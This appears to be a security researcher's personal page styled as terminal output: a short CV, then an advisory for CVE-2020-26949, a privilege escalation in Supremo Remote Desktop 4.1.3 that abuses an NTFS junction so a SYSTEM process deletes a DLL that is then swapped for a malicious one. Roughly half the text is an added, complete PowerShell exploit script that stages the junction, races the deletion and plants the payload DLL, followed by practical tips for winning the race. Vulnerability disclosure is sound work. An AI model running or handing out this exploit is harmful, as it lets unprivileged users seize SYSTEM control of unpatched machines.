$ ./rce.sh
[+] Checking credentials: Anders Kusk
[+] OSCP Cert loaded
[+] OSCE Cert loaded
[+] Parsing cv.bin
0x00002007: 4461 6e69 7368 2050 6f6c 6963 652c 204f 6666 6963 6572 2020 2020 2020 2020 200a Danish Police, Officer .
0x00002018: 5444 432c 2049 6e74 6572 6e61 6c20 5065 6e74 6573 7465 7220 2020 2020 2020 200a TDC, Internal Pentester .
0x00002019: 496d 7072 6f73 6563 2c20 5365 6375 7269 7479 2041 6476 6973 6f72 2020 2020 200a Improsec, Security Advisor .
[=] Loading externals
-> mutt -s "Hello" a@rce.sh < /dev/null
-> curl -v https://www.linkedin.com/in/anders-kusk
-> curl -v https://github.com/kusk/
-> curl -v https://www.hackthebox.eu/profile/9409
-> curl -v https://twitter.com/anderskusk
$ echo return to root
$ cat ./cve/CVE-2020-26949 - Supremo Remote Desktop Privilege escalation.md

CVE-2020-26949 - Supremo Remote Desktop Privilege escalation

Affected product and version: Supremo Remote Desktop version 4.1.3

Fixed version: Supremo Remote Desktop version 4.2.0

Website: https://www.supremocontrol.com

Assigned CVE: CVE-2020-26949

A quick privesc vulnerability I found in a small remote desktop application called Supremo.

Supremo installs a service executable, "C:\Program Files (x86)\Supremo\SupremoService.exe", that runs in the context of "NT AUTHORITY\SYSTEM". Supremo also ships a small tray application from which the application can be controlled and configured.

If a user exits the tray application, the executable "Supremo.exe" (running as NT AUTHORITY\SYSTEM) restarts, and during this restart it deletes the directory "C:\Windows\Temp\Supremo.madExcept" together with all files and subdirectories inside it.

After this, "Supremo.exe" loads a DLL called "openh264-win32.dll" from "C:\Windows\Temp\Supremo\[USER ID]\". The permissions on the DLL file only allow low-privilege users to read it, so it cannot simply be overwritten. However, its parent directory allows all users to create new files.

Using James Forshaw's symboliclink-testing-tools, we manually created "C:\Windows\Temp\Supremo.madExcept" as a mount point (NTFS junction) pointing at "C:\Windows\Temp\Supremo\[USER ID]". When the SYSTEM process recursively deleted "Supremo.madExcept", it followed the junction and deleted "openh264-win32.dll" in the user directory, which we could then quickly replace with our own malicious DLL before "Supremo.exe" loaded it. Creating a mount point does not require any special privilege, which is why a low-privilege user can stage this.

The malicious DLL executes "cmd.exe /c whoami > C:\pwn.txt" as NT AUTHORITY\SYSTEM.
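The delete-and-replace race described above, written out as an added PowerShell example that is not the advisory author's code. It uses PowerShell's built-in `New-Item -ItemType Junction` in place of CreateMountPoint.exe from symboliclink-testing-tools; the per-user directory name, the payload path and the 60-second timeout are assumptions, and the malicious DLL itself is assumed to be built separately. The ACL check at the start verifies the one precondition the advisory relies on (create-file rights for unprivileged users on the parent directory) before touching anything.

```powershell
# Added example (not from the advisory): stage the junction, wait for the SYSTEM
# process to delete openh264-win32.dll through it, then drop a payload in its place.
# Assumed values: the [USER ID] directory name, the payload location, the timeout.

$UserDir   = 'C:\Windows\Temp\Supremo\<USER ID>'        # assumed: directory Supremo.exe loads the DLL from
$Junction  = 'C:\Windows\Temp\Supremo.madExcept'         # directory the service deletes on restart
$TargetDll = Join-Path $UserDir 'openh264-win32.dll'
$Payload   = 'C:\Users\Public\openh264-win32.dll'        # assumed: attacker-built DLL (runs cmd.exe in DllMain)

# 1. Precondition: low-privilege users must be able to create files in the parent
#    directory. The DLL itself is read-only for them, so overwriting it directly fails.
$createFiles = [System.Security.AccessControl.FileSystemRights]::CreateFiles
$acl = Get-Acl -Path $UserDir
$writable = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    ($_.FileSystemRights -band $createFiles) -and
    $_.IdentityReference -match 'Users|Everyone|Authenticated Users'
}
if (-not $writable) {
    throw "No create-file right on $UserDir for unprivileged users; not vulnerable as described."
}

# 2. Supremo.madExcept must not exist yet (the service removed it on its last restart).
#    Recreate it as an NTFS junction to the user directory. Junctions, unlike symbolic
#    links, need no SeCreateSymbolicLinkPrivilege, so a normal user can do this.
if (Test-Path -LiteralPath $Junction) {
    throw "$Junction already exists; wait for the service to remove it first."
}
New-Item -ItemType Junction -Path $Junction -Target $UserDir | Out-Null

# 3. The tray application is exited by hand. The SYSTEM process then recursively
#    deletes Supremo.madExcept, follows the junction, and removes openh264-win32.dll.
Write-Host "Junction in place. Exit the Supremo tray application now."

# 4. Race: the moment the DLL disappears, write the payload under the same name,
#    before Supremo.exe calls LoadLibrary on it. The loop polls every 5 ms.
$deadline = (Get-Date).AddSeconds(60)
while (Test-Path -LiteralPath $TargetDll) {
    if ((Get-Date) -gt $deadline) { throw "DLL was never deleted; did the restart happen?" }
    Start-Sleep -Milliseconds 5
}
Copy-Item -LiteralPath $Payload -Destination $TargetDll -Force
Write-Host "Payload written to $TargetDll; check C:\pwn.txt for SYSTEM's whoami output."
```

Two practical notes: the recursive delete removes the attacker's own junction as well, so the script only needs to win the window between the delete and the subsequent load, and a polling loop this tight is normally enough on a lightly loaded host; and since the junction target is the user directory, anything else stored there is deleted too, which is worth checking before running this against a machine you care about.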